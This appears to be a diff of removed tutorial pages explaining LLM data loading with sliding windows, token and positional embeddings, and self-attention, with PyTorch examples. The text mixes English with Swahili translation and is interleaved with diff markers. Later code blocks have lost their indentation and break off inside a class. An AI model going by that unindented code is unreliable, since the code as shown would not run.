<table><thead><tr><th width="222">Token Position</th><th>Token</th></tr></thead><tbody><tr><td>1</td><td>Lorem</td></tr><tr><td>2</td><td>ipsum</td></tr><tr><td>3</td><td>dolor</td></tr><tr><td>4</td><td>sit</td></tr><tr><td>5</td><td>amet,</td></tr><tr><td>6</td><td>consectetur</td></tr><tr><td>7</td><td>adipiscing</td></tr><tr><td>8</td><td>elit.</td></tr></tbody></table>

**Sliding Window with Stride 1:**

- **First Window (Positions 1-4):** \["Lorem", "ipsum", "dolor", "sit"] → **Target:** \["ipsum", "dolor", "sit", "amet,"]
- **Second Window (Positions 2-5):** \["ipsum", "dolor", "sit", "amet,"] → **Target:** \["dolor", "sit", "amet,", "consectetur"]
- **Third Window (Positions 3-6):** \["dolor", "sit", "amet,", "consectetur"] → **Target:** \["sit", "amet,", "consectetur", "adipiscing"]
- **Fourth Window (Positions 4-7):** \["sit", "amet,", "consectetur", "adipiscing"] → **Target:** \["amet,", "consectetur", "adipiscing", "elit."]

**Understanding Stride**

- **Stride of 1:** The window moves forward by one token each time, resulting in highly overlapping sequences. This can lead to better learning of contextual relationships but may increase the risk of overfitting since similar data points are repeated.
- **Stride of 2:** The window moves forward by two tokens each time, reducing overlap. This decreases redundancy and computational load but might miss some contextual nuances.
- **Stride Equal to max_length:** The window moves forward by the entire window size, resulting in non-overlapping sequences. This minimizes data redundancy but may limit the model's ability to learn dependencies across sequences.

**Example with Stride of 2:**

Using the same tokenized text and `max_length` of 4:

- **First Window (Positions 1-4):** \["Lorem", "ipsum", "dolor", "sit"] → **Target:** \["ipsum", "dolor", "sit", "amet,"]
- **Second Window (Positions 3-6):** \["dolor", "sit", "amet,", "consectetur"] → **Target:** \["sit", "amet,", "consectetur", "adipiscing"]
- **Third Window (Positions 5-8):** \["amet,", "consectetur", "adipiscing", "elit."] → **Target:** \["consectetur", "adipiscing", "elit.", "sed"] _(Assuming continuation)_

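A tiny, self-contained sketch of the windowing logic described above (pure Python, using the word tokens from the example rather than real token IDs):
```python
tokens = ["Lorem", "ipsum", "dolor", "sit", "amet,", "consectetur", "adipiscing", "elit."]
max_length, stride = 4, 2

# Slide a window over the tokens; the target is the same window shifted by one token
for i in range(0, len(tokens) - max_length, stride):
    inp = tokens[i:i + max_length]
    tgt = tokens[i + 1:i + max_length + 1]
    print(inp, "->", tgt)
# ['Lorem', 'ipsum', 'dolor', 'sit'] -> ['ipsum', 'dolor', 'sit', 'amet,']
# ['dolor', 'sit', 'amet,', 'consectetur'] -> ['sit', 'amet,', 'consectetur', 'adipiscing']
```
Note that, like the `GPTDatasetV1` class below, the loop stops while a full target window still fits, so the last partial window of the example table is not produced.
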
## Code Example

Let's understand this better from a code example from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb):

```python
# Download the text to pre-train the LLM
import urllib.request
url = ("https://raw.githubusercontent.com/rasbt/LLMs-from-scratch/main/ch02/01_main-chapter-code/the-verdict.txt")
file_path = "the-verdict.txt"
urllib.request.urlretrieve(url, file_path)

with open("the-verdict.txt", "r", encoding="utf-8") as f:
    raw_text = f.read()

"""
Create a class that will receive some params like tokenizer and text
and will prepare the input chunks and the target chunks to prepare
the LLM to learn which next token to generate
"""
import torch
from torch.utils.data import Dataset, DataLoader

class GPTDatasetV1(Dataset):
    def __init__(self, txt, tokenizer, max_length, stride):
        self.input_ids = []
        self.target_ids = []

        # Tokenize the entire text
        token_ids = tokenizer.encode(txt, allowed_special={"<|endoftext|>"})

        # Use a sliding window to chunk the book into overlapping sequences of max_length
        for i in range(0, len(token_ids) - max_length, stride):
            input_chunk = token_ids[i:i + max_length]
            target_chunk = token_ids[i + 1: i + max_length + 1]
            self.input_ids.append(torch.tensor(input_chunk))
            self.target_ids.append(torch.tensor(target_chunk))

    def __len__(self):
        return len(self.input_ids)

    def __getitem__(self, idx):
        return self.input_ids[idx], self.target_ids[idx]


"""
Create a data loader which given the text and some params will
prepare the inputs and targets with the previous class and
then create a torch DataLoader with the info
"""

import tiktoken

def create_dataloader_v1(txt, batch_size=4, max_length=256,
                         stride=128, shuffle=True, drop_last=True,
                         num_workers=0):

    # Initialize the tokenizer
    tokenizer = tiktoken.get_encoding("gpt2")

    # Create dataset
    dataset = GPTDatasetV1(txt, tokenizer, max_length, stride)

    # Create dataloader
    dataloader = DataLoader(
        dataset,
        batch_size=batch_size,
        shuffle=shuffle,
        drop_last=drop_last,
        num_workers=num_workers
    )

    return dataloader


"""
Finally, create the data loader with the params we want:
- The used text for training
- batch_size: The size of each batch
- max_length: The size of each entry on each batch
- stride: The sliding window (how many tokens should the next entry advance compared to the previous one). The smaller, the more overfitting; usually this is equal to max_length so the same tokens aren't repeated.
- shuffle: Re-order randomly
"""
dataloader = create_dataloader_v1(
    raw_text, batch_size=8, max_length=4, stride=1, shuffle=False
)

data_iter = iter(dataloader)
first_batch = next(data_iter)
print(first_batch)

# Note the batch_size of 8, the max_length of 4 and the stride of 1
[
# Input
tensor([[   40,   367,  2885,  1464],
        [  367,  2885,  1464,  1807],
        [ 2885,  1464,  1807,  3619],
        [ 1464,  1807,  3619,   402],
        [ 1807,  3619,   402,   271],
        [ 3619,   402,   271, 10899],
        [  402,   271, 10899,  2138],
        [  271, 10899,  2138,   257]]),
# Target
tensor([[  367,  2885,  1464,  1807],
        [ 2885,  1464,  1807,  3619],
        [ 1464,  1807,  3619,   402],
        [ 1807,  3619,   402,   271],
        [ 3619,   402,   271, 10899],
        [  402,   271, 10899,  2138],
        [  271, 10899,  2138,   257],
        [10899,  2138,   257,  7026]])
]

# With stride=4 this will be the result:
[
# Input
tensor([[   40,   367,  2885,  1464],
        [ 1807,  3619,   402,   271],
        [10899,  2138,   257,  7026],
        [15632,   438,  2016,   257],
        [  922,  5891,  1576,   438],
        [  568,   340,   373,   645],
        [ 1049,  5975,   284,   502],
        [  284,  3285,   326,    11]]),
# Target
tensor([[  367,  2885,  1464,  1807],
        [ 3619,   402,   271, 10899],
        [ 2138,   257,  7026, 15632],
        [  438,  2016,   257,   922],
        [ 5891,  1576,   438,   568],
        [  340,   373,   645,  1049],
        [ 5975,   284,   502,   284],
        [ 3285,   326,    11,   287]])
]
```

## References

- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)

@ -1,203 +0,0 @@
# 3. Token Embeddings

## Token Embeddings

After tokenizing the text data, the next critical step in preparing data for training large language models (LLMs) like GPT is creating **token embeddings**. Token embeddings transform discrete tokens (such as words or subwords) into continuous numerical vectors that the model can process and learn from. This explanation breaks down token embeddings, their initialization, usage, and the role of positional embeddings in enhancing the model's understanding of token sequences.

> [!TIP]
> The goal of this third phase is very simple: **Assign each of the previous tokens in the vocabulary a vector of the desired dimensions to train the model.** Each word in the vocabulary will be a point in a space of X dimensions.\
> Note that initially the position of each word in the space is just initialized "randomly" and these positions are trainable parameters (they will be improved during training).
>
> Moreover, during the token embedding **another layer of embeddings is created** which represents (in this case) the **absolute position of the word in the training sentence**. This way, a word in different positions in the sentence will have a different representation (meaning).

### **What Are Token Embeddings?**

**Token Embeddings** are numerical representations of tokens in a continuous vector space. Each token in the vocabulary is associated with a unique vector of fixed dimensions. These vectors capture semantic and syntactic information about the tokens, enabling the model to understand relationships and patterns in the data.

- **Vocabulary Size:** The total number of unique tokens (e.g., words, subwords) in the model's vocabulary.
- **Embedding Dimensions:** The number of numerical values (dimensions) in each token's vector. Higher dimensions can capture more nuanced information but require more computational resources.

**Example:**

- **Vocabulary Size:** 6 tokens \[1, 2, 3, 4, 5, 6]
- **Embedding Dimensions:** 3 (x, y, z)

### **Initializing Token Embeddings**

At the start of training, token embeddings are typically initialized with small random values. These initial values are adjusted (fine-tuned) during training to better represent the tokens' meanings based on the training data.

**PyTorch Example:**
```python
import torch

# Set a random seed for reproducibility
torch.manual_seed(123)

# Create an embedding layer with 6 tokens and 3 dimensions
embedding_layer = torch.nn.Embedding(6, 3)

# Display the initial weights (embeddings)
print(embedding_layer.weight)
```
**Output:**
```lua
Parameter containing:
tensor([[ 0.3374, -0.1778, -0.1690],
        [ 0.9178,  1.5810,  1.3010],
        [ 1.2753, -0.2010, -0.1606],
        [-0.4015,  0.9666, -1.1481],
        [-1.1589,  0.3255, -0.6315],
        [-2.8400, -0.7849, -1.4096]], requires_grad=True)
```
**Explanation:**

- Each row represents a token in the vocabulary.
- Each column represents a dimension in the embedding vector.
- For example, the token at index `3` has the embedding vector `[-0.4015, 0.9666, -1.1481]`.

**Accessing a Token's Embedding:**
```python
# Retrieve the embedding for the token at index 3
token_index = torch.tensor([3])
print(embedding_layer(token_index))
```
**Output:**
```lua
tensor([[-0.4015,  0.9666, -1.1481]], grad_fn=<EmbeddingBackward0>)
```
**Tafsiri:**
 | 
			
		||||
 | 
			
		||||
- Token katika index `3` inawakilishwa na vector `[-0.4015, 0.9666, -1.1481]`.
 | 
			
		||||
- Hizi ni thamani zinazoweza kufundishwa ambazo modeli itazirekebisha wakati wa mafunzo ili kuwakilisha muktadha na maana ya token vizuri zaidi.
 | 
			
		||||
 | 
			
		||||
### **Jinsi Token Embeddings Zinavyofanya Kazi Wakati wa Mafunzo**
 | 
			
		||||
 | 
			
		||||
Wakati wa mafunzo, kila token katika data ya ingizo inabadilishwa kuwa vector yake inayolingana ya embedding. Vectors hizi kisha zinatumika katika hesabu mbalimbali ndani ya modeli, kama vile mifumo ya umakini na tabaka za mtandao wa neva.
 | 
			
		||||
 | 
			
		||||
**Mfano wa Hali:**
 | 
			
		||||
 | 
			
		||||
- **Batch Size:** 8 (idadi ya sampuli zinazoshughulikiwa kwa wakati mmoja)
 | 
			
		||||
- **Max Sequence Length:** 4 (idadi ya token kwa sampuli)
 | 
			
		||||
- **Embedding Dimensions:** 256
 | 
			
		||||
 | 
			
		||||
**Muundo wa Data:**
 | 
			
		||||
 | 
			
		||||
- Kila batch inawakilishwa kama tensor ya 3D yenye umbo `(batch_size, max_length, embedding_dim)`.
 | 
			
		||||
- Kwa mfano letu, umbo litakuwa `(8, 4, 256)`.
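A minimal sketch of this scenario (the vocabulary size of 50,257 is the BPE vocabulary used in the later code example; the other numbers come from the bullet points above):

```python
import torch

token_embedding_layer = torch.nn.Embedding(50257, 256)  # vocab_size=50257, embedding_dim=256
token_ids = torch.randint(0, 50257, (8, 4))             # batch_size=8, max_length=4
print(token_embedding_layer(token_ids).shape)           # torch.Size([8, 4, 256])
```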
 | 
			
		||||
 | 
			
		||||
**Uonyeshaji:**
 | 
			
		||||
```css
 | 
			
		||||
Batch
 | 
			
		||||
┌─────────────┐
 | 
			
		||||
│ Sample 1    │
 | 
			
		||||
│ ┌─────┐     │
 | 
			
		||||
│ │Token│ → [x₁₁, x₁₂, ..., x₁₂₅₆]
 | 
			
		||||
│ │ 1   │     │
 | 
			
		||||
│ │...  │     │
 | 
			
		||||
│ │Token│     │
 | 
			
		||||
│ │ 4   │     │
 | 
			
		||||
│ └─────┘     │
 | 
			
		||||
│ Sample 2    │
 | 
			
		||||
│ ┌─────┐     │
 | 
			
		||||
│ │Token│ → [x₂₁, x₂₂, ..., x₂₂₅₆]
 | 
			
		||||
│ │ 1   │     │
 | 
			
		||||
│ │...  │     │
 | 
			
		||||
│ │Token│     │
 | 
			
		||||
│ │ 4   │     │
 | 
			
		||||
│ └─────┘     │
 | 
			
		||||
│ ...         │
 | 
			
		||||
│ Sample 8    │
 | 
			
		||||
│ ┌─────┐     │
 | 
			
		||||
│ │Token│ → [x₈₁, x₈₂, ..., x₈₂₅₆]
 | 
			
		||||
│ │ 1   │     │
 | 
			
		||||
│ │...  │     │
 | 
			
		||||
│ │Token│     │
 | 
			
		||||
│ │ 4   │     │
 | 
			
		||||
│ └─────┘     │
 | 
			
		||||
└─────────────┘
 | 
			
		||||
```
 | 
			
		||||
**Maelezo:**
 | 
			
		||||
 | 
			
		||||
- Kila token katika mfuatano inawakilishwa na vector ya vipimo 256.
 | 
			
		||||
- Mfano unashughulikia embeddings hizi ili kujifunza mifumo ya lugha na kutoa makadirio.
 | 
			
		||||
 | 
			
		||||
## **Embeddings za Nafasi: Kuongeza Muktadha kwa Embeddings za Token**
 | 
			
		||||
 | 
			
		||||
Wakati embeddings za token zinashika maana ya tokens binafsi, hazijajumuisha kwa asili nafasi ya tokens ndani ya mfuatano. Kuelewa mpangilio wa tokens ni muhimu kwa ufahamu wa lugha. Hapa ndipo **embeddings za nafasi** zinapokuja.
 | 
			
		||||
 | 
			
		||||
### **Kwa Nini Embeddings za Nafasi Zinahitajika:**
 | 
			
		||||
 | 
			
		||||
- **Mpangilio wa Token Una umuhimu:** Katika sentensi, maana mara nyingi inategemea mpangilio wa maneno. Kwa mfano, "Paka aliketi kwenye mkeka" dhidi ya "Mkeka ulikaa juu ya paka."
 | 
			
		||||
- **Kikomo cha Embedding:** Bila taarifa za nafasi, mfano unachukulia tokens kama "mfuko wa maneno," ukipuuzia mfuatano wao.
 | 
			
		||||
 | 
			
		||||
### **Aina za Embeddings za Nafasi:**
 | 
			
		||||
 | 
			
		||||
1. **Embeddings za Nafasi za Kipekee:**
 | 
			
		||||
- Kutoa vector ya nafasi ya kipekee kwa kila nafasi katika mfuatano.
 | 
			
		||||
- **Mfano:** Token ya kwanza katika mfuatano wowote ina embedding ya nafasi sawa, token ya pili ina nyingine, na kadhalika.
 | 
			
		||||
- **Inatumika na:** Mfano wa GPT wa OpenAI.
 | 
			
		||||
2. **Embeddings za Nafasi za Kihusiano:**
 | 
			
		||||
- Kuandika umbali wa kihusiano kati ya tokens badala ya nafasi zao za kipekee.
 | 
			
		||||
- **Mfano:** Kuonyesha jinsi tokens mbili zilivyo mbali, bila kujali nafasi zao za kipekee katika mfuatano.
 | 
			
		||||
- **Inatumika na:** Mifano kama Transformer-XL na baadhi ya toleo za BERT.
 | 
			
		||||
 | 
			
		||||
### **Jinsi Embeddings za Nafasi Zinavyounganishwa:**
 | 
			
		||||
 | 
			
		||||
- **Vipimo Vilevile:** Embeddings za nafasi zina vipimo sawa na embeddings za token.
 | 
			
		||||
- **Kuongeza:** Zinajumuishwa na embeddings za token, zikichanganya utambulisho wa token na taarifa za nafasi bila kuongeza vipimo vya jumla.
 | 
			
		||||
 | 
			
		||||
**Mfano wa Kuongeza Embeddings za Nafasi:**
 | 
			
		||||
 | 
			
		||||
Kiwango cha embedding cha token ni `[0.5, -0.2, 0.1]` na kiwango chake cha embedding cha nafasi ni `[0.1, 0.3, -0.1]`. Embedding iliyounganishwa inayotumika na mfano ingekuwa:
 | 
			
		||||
```css
 | 
			
		||||
Combined Embedding = Token Embedding + Positional Embedding
 | 
			
		||||
= [0.5 + 0.1, -0.2 + 0.3, 0.1 + (-0.1)]
 | 
			
		||||
= [0.6, 0.1, 0.0]
 | 
			
		||||
```
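The same addition in PyTorch, using the example vectors above:

```python
import torch

token_emb = torch.tensor([0.5, -0.2, 0.1])
pos_emb   = torch.tensor([0.1,  0.3, -0.1])
print(token_emb + pos_emb)  # tensor([0.6000, 0.1000, 0.0000])
```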
 | 
			
		||||
**Faida za Positional Embeddings:**
 | 
			
		||||
 | 
			
		||||
- **Uelewa wa Muktadha:** Mfano unaweza kutofautisha kati ya tokens kulingana na nafasi zao.
 | 
			
		||||
- **Uelewa wa Mfuatano:** Inamwezesha mfano kuelewa sarufi, sintaksia, na maana zinazotegemea muktadha.
 | 
			
		||||
 | 
			
		||||
## Mfano wa Kanuni
 | 
			
		||||
 | 
			
		||||
Ufuatao ni mfano wa kanuni kutoka [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb):
 | 
			
		||||
```python
 | 
			
		||||
# Use previous code...
 | 
			
		||||
 | 
			
		||||
# Create dimensional embeddings
 | 
			
		||||
"""
 | 
			
		||||
BPE uses a vocabulary of 50257 words
 | 
			
		||||
Let's suppose we want to use 256 dimensions (instead of the thousands used by large LLMs)
 | 
			
		||||
"""
 | 
			
		||||
 | 
			
		||||
vocab_size = 50257
 | 
			
		||||
output_dim = 256
 | 
			
		||||
token_embedding_layer = torch.nn.Embedding(vocab_size, output_dim)
 | 
			
		||||
 | 
			
		||||
## Generate the dataloader like before
 | 
			
		||||
max_length = 4
 | 
			
		||||
dataloader = create_dataloader_v1(
 | 
			
		||||
raw_text, batch_size=8, max_length=max_length,
 | 
			
		||||
stride=max_length, shuffle=False
 | 
			
		||||
)
 | 
			
		||||
data_iter = iter(dataloader)
 | 
			
		||||
inputs, targets = next(data_iter)
 | 
			
		||||
 | 
			
		||||
# Apply embeddings
 | 
			
		||||
token_embeddings = token_embedding_layer(inputs)
 | 
			
		||||
print(token_embeddings.shape)
 | 
			
		||||
# Output: torch.Size([8, 4, 256]) -> 8 x 4 x 256
 | 
			
		||||
 | 
			
		||||
# Generate absolute embeddings
 | 
			
		||||
context_length = max_length
 | 
			
		||||
pos_embedding_layer = torch.nn.Embedding(context_length, output_dim)
 | 
			
		||||
 | 
			
		||||
pos_embeddings = pos_embedding_layer(torch.arange(max_length))
 | 
			
		||||
 | 
			
		||||
input_embeddings = token_embeddings + pos_embeddings
 | 
			
		||||
print(input_embeddings.shape) # torch.Size([8, 4, 256])
 | 
			
		||||
```
 | 
			
		||||
## Marejeo
 | 
			
		||||
 | 
			
		||||
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
 | 
			
		||||
@ -1,416 +0,0 @@
 | 
			
		||||
# 4. Attention Mechanisms
 | 
			
		||||
 | 
			
		||||
## Attention Mechanisms and Self-Attention in Neural Networks
 | 
			
		||||
 | 
			
		||||
Attention mechanisms allow neural networks to **focus on specific parts of the input when generating each part of the output**. They assign different weights to different inputs, helping the model decide which inputs are most relevant to the task at hand. This is crucial in tasks like machine translation, where understanding the context of the entire sentence is necessary for accurate translation.
 | 
			
		||||
 | 
			
		||||
> [!TIP]
 | 
			
		||||
> The goal of this fourth phase is very simple: **Apply some attention mechanisms**. These are going to be a lot of **repeated layers** that are going to **capture the relation of a word in the vocabulary with its neighbours in the current sentence being used to train the LLM**.\
 | 
			
		||||
> A lot of layers are used for this, so a lot of trainable parameters are going to be capturing this information.
 | 
			
		||||
 | 
			
		||||
### Understanding Attention Mechanisms
 | 
			
		||||
 | 
			
		||||
In traditional sequence-to-sequence models used for language translation, the model encodes an input sequence into a fixed-size context vector. However, this approach struggles with long sentences because the fixed-size context vector may not capture all necessary information. Attention mechanisms address this limitation by allowing the model to consider all input tokens when generating each output token.
 | 
			
		||||
 | 
			
		||||
#### Example: Machine Translation
 | 
			
		||||
 | 
			
		||||
Consider translating the German sentence "Kannst du mir helfen diesen Satz zu übersetzen" into English. A word-by-word translation would not produce a grammatically correct English sentence due to differences in grammatical structures between languages. An attention mechanism enables the model to focus on relevant parts of the input sentence when generating each word of the output sentence, leading to a more accurate and coherent translation.
 | 
			
		||||
 | 
			
		||||
### Introduction to Self-Attention
 | 
			
		||||
 | 
			
		||||
Self-attention, or intra-attention, is a mechanism where attention is applied within a single sequence to compute a representation of that sequence. It allows each token in the sequence to attend to all other tokens, helping the model capture dependencies between tokens regardless of their distance in the sequence.
 | 
			
		||||
 | 
			
		||||
#### Key Concepts
 | 
			
		||||
 | 
			
		||||
- **Tokens**: Vipengele vya kibinafsi vya mfuatano wa ingizo (e.g., maneno katika sentensi).
 | 
			
		||||
- **Embeddings**: Uwakilishi wa vector wa tokens, ukichukua taarifa za maana.
 | 
			
		||||
- **Attention Weights**: Thamani zinazotathmini umuhimu wa kila token kulingana na wengine.
 | 
			
		||||
 | 
			
		||||
### Calculating Attention Weights: A Step-by-Step Example
 | 
			
		||||
 | 
			
		||||
Let's consider the sentence **"Hello shiny sun!"** and represent each word with a 3-dimensional embedding:
 | 
			
		||||
 | 
			
		||||
- **Hello**: `[0.34, 0.22, 0.54]`
 | 
			
		||||
- **shiny**: `[0.53, 0.34, 0.98]`
 | 
			
		||||
- **sun**: `[0.29, 0.54, 0.93]`
 | 
			
		||||
 | 
			
		||||
Our goal is to compute the **context vector** for the word **"shiny"** using self-attention.
 | 
			
		||||
 | 
			
		||||
#### Step 1: Compute Attention Scores
 | 
			
		||||
 | 
			
		||||
> [!TIP]
 | 
			
		||||
> Just multiply each dimension value of the query with the relevant one of each token and add the results. You get 1 value per pair of tokens.
 | 
			
		||||
 | 
			
		||||
For each word in the sentence, compute the **attention score** with respect to "shiny" by calculating the dot product of their embeddings.
 | 
			
		||||
 | 
			
		||||
**Attention Score between "Hello" and "shiny"**
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (4) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
**Attention Score between "shiny" and "shiny"**
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
**Attention Score between "sun" and "shiny"**
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (2) (1) (1) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
#### Step 2: Normalize Attention Scores to Obtain Attention Weights
 | 
			
		||||
 | 
			
		||||
> [!TIP]
 | 
			
		||||
> Don't get lost in the mathematical terms; the goal of this function is simple: normalize all the weights so **they sum to 1 in total**.
 | 
			
		||||
>
 | 
			
		||||
> Moreover, the **softmax** function is used because it accentuates differences due to the exponential part, making it easier to detect useful values.
 | 
			
		||||
 | 
			
		||||
Apply the **softmax function** to the attention scores to convert them into attention weights that sum to 1.
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (3) (1) (1) (1) (1).png" alt="" width="293"><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
Calculating the exponentials:
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (4) (1) (1) (1).png" alt="" width="249"><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
Calculating the sum:
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (5) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
Calculating attention weights:
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (6) (1) (1).png" alt="" width="404"><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
#### Step 3: Compute the Context Vector
 | 
			
		||||
 | 
			
		||||
> [!TIP]
 | 
			
		||||
> Just get each attention weight and multiply it to the related token dimensions and then sum all the dimensions to get just 1 vector (the context vector)
 | 
			
		||||
 | 
			
		||||
The **context vector** is computed as the weighted sum of the embeddings of all words, using the attention weights.
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (16).png" alt="" width="369"><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
Calculating each component:
 | 
			
		||||
 | 
			
		||||
- **Weighted Embedding of "Hello"**:
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (7) (1) (1).png" alt=""><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
- **Weighted Embedding of "shiny"**:
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (8) (1) (1).png" alt=""><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
- **Weighted Embedding of "sun"**:
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (9) (1) (1).png" alt=""><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
Summing the weighted embeddings:
 | 
			
		||||
 | 
			
		||||
`context vector=[0.0779+0.2156+0.1057, 0.0504+0.1382+0.1972, 0.1237+0.3983+0.3390]=[0.3992,0.3858,0.8610]`
 | 
			
		||||
 | 
			
		||||
**This context vector represents the enriched embedding for the word "shiny," incorporating information from all words in the sentence.**
 | 
			
		||||
 | 
			
		||||
### Summary of the Process
 | 
			
		||||
 | 
			
		||||
1. **Compute Attention Scores**: Use the dot product between the embedding of the target word and the embeddings of all words in the sequence.
 | 
			
		||||
2. **Normalize Scores to Get Attention Weights**: Apply the softmax function to the attention scores to obtain weights that sum to 1.
 | 
			
		||||
3. **Compute Context Vector**: Multiply each word's embedding by its attention weight and sum the results.
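The three steps above can be condensed into a short PyTorch sketch. It reuses the example embeddings for "Hello shiny sun!", and the printed context vector should match the hand-computed `[0.3992, 0.3858, 0.8610]` up to rounding:

```python
import torch

# Example embeddings for "Hello shiny sun!"
embeddings = torch.tensor([
    [0.34, 0.22, 0.54],  # Hello
    [0.53, 0.34, 0.98],  # shiny
    [0.29, 0.54, 0.93],  # sun
])

query = embeddings[1]                   # "shiny" is the target word
scores = embeddings @ query             # Step 1: dot-product attention scores
weights = torch.softmax(scores, dim=0)  # Step 2: attention weights that sum to 1
context = weights @ embeddings          # Step 3: weighted sum of all embeddings
print(context)                          # approximately tensor([0.3992, 0.3858, 0.8610])
```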
 | 
			
		||||
 | 
			
		||||
## Self-Attention with Trainable Weights
 | 
			
		||||
 | 
			
		||||
In practice, self-attention mechanisms use **trainable weights** to learn the best representations for queries, keys, and values. This involves introducing three weight matrices:
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (10) (1) (1).png" alt="" width="239"><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
The query is the data to use like before, while the key and value matrices are simply randomly initialized, trainable matrices.
 | 
			
		||||
 | 
			
		||||
#### Step 1: Compute Queries, Keys, and Values
 | 
			
		||||
 | 
			
		||||
Each token will have its own query, key and value matrix by multiplying its dimension values by the defined matrices:
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (11).png" alt="" width="253"><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
These matrices transform the original embeddings into a new space suitable for computing attention.
 | 
			
		||||
 | 
			
		||||
**Example**
 | 
			
		||||
 | 
			
		||||
Assuming:
 | 
			
		||||
 | 
			
		||||
- Input dimension `din=3` (embedding size)
 | 
			
		||||
- Output dimension `dout=2` (desired dimension for queries, keys, and values)
 | 
			
		||||
 | 
			
		||||
Initialize the weight matrices:
 | 
			
		||||
```python
 | 
			
		||||
import torch.nn as nn
 | 
			
		||||
 | 
			
		||||
d_in = 3
 | 
			
		||||
d_out = 2
 | 
			
		||||
 | 
			
		||||
W_query = nn.Parameter(torch.rand(d_in, d_out))
 | 
			
		||||
W_key = nn.Parameter(torch.rand(d_in, d_out))
 | 
			
		||||
W_value = nn.Parameter(torch.rand(d_in, d_out))
 | 
			
		||||
```
 | 
			
		||||
Hesabu maswali, funguo, na thamani:
 | 
			
		||||
```python
 | 
			
		||||
queries = torch.matmul(inputs, W_query)
 | 
			
		||||
keys = torch.matmul(inputs, W_key)
 | 
			
		||||
values = torch.matmul(inputs, W_value)
 | 
			
		||||
```
 | 
			
		||||
#### Step 2: Compute Scaled Dot-Product Attention
 | 
			
		||||
 | 
			
		||||
**Compute Attention Scores**
 | 
			
		||||
 | 
			
		||||
Kama ilivyo katika mfano wa awali, lakini wakati huu, badala ya kutumia thamani za vipimo vya tokens, tunatumia matrix ya funguo ya token (iliyohesabiwa tayari kwa kutumia vipimo). Hivyo, kwa kila query `qi` na funguo `kj`:
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (12).png" alt=""><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
**Scale the Scores**
 | 
			
		||||
 | 
			
		||||
Ili kuzuia dot products kuwa kubwa sana, zigawanye kwa mzizi wa mraba wa kipimo cha funguo `dk`:
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (13).png" alt="" width="295"><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
> [!TIP]
 | 
			
		||||
> Alama inagawanywa kwa mzizi wa mraba wa vipimo kwa sababu dot products zinaweza kuwa kubwa sana na hii inasaidia kudhibitiwa.
 | 
			
		||||
 | 
			
		||||
**Apply Softmax to Obtain Attention Weights:** Kama katika mfano wa awali, normalize thamani zote ili jumla yake iwe 1.
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (14).png" alt="" width="295"><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
#### Step 3: Compute Context Vectors
 | 
			
		||||
 | 
			
		||||
Kama katika mfano wa awali, jumlisha tu matrix zote za thamani ukizidisha kila moja kwa uzito wake wa umakini:
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (15).png" alt="" width="328"><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
### Code Example
 | 
			
		||||
 | 
			
		||||
Grabbing an example from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb) you can check this class that implements the self-attention functionality we talked about:
 | 
			
		||||
```python
 | 
			
		||||
import torch
 | 
			
		||||
 | 
			
		||||
inputs = torch.tensor(
 | 
			
		||||
[[0.43, 0.15, 0.89], # Your     (x^1)
 | 
			
		||||
[0.55, 0.87, 0.66], # journey  (x^2)
 | 
			
		||||
[0.57, 0.85, 0.64], # starts   (x^3)
 | 
			
		||||
[0.22, 0.58, 0.33], # with     (x^4)
 | 
			
		||||
[0.77, 0.25, 0.10], # one      (x^5)
 | 
			
		||||
[0.05, 0.80, 0.55]] # step     (x^6)
 | 
			
		||||
)
 | 
			
		||||
 | 
			
		||||
import torch.nn as nn
 | 
			
		||||
class SelfAttention_v2(nn.Module):
 | 
			
		||||
 | 
			
		||||
def __init__(self, d_in, d_out, qkv_bias=False):
 | 
			
		||||
super().__init__()
 | 
			
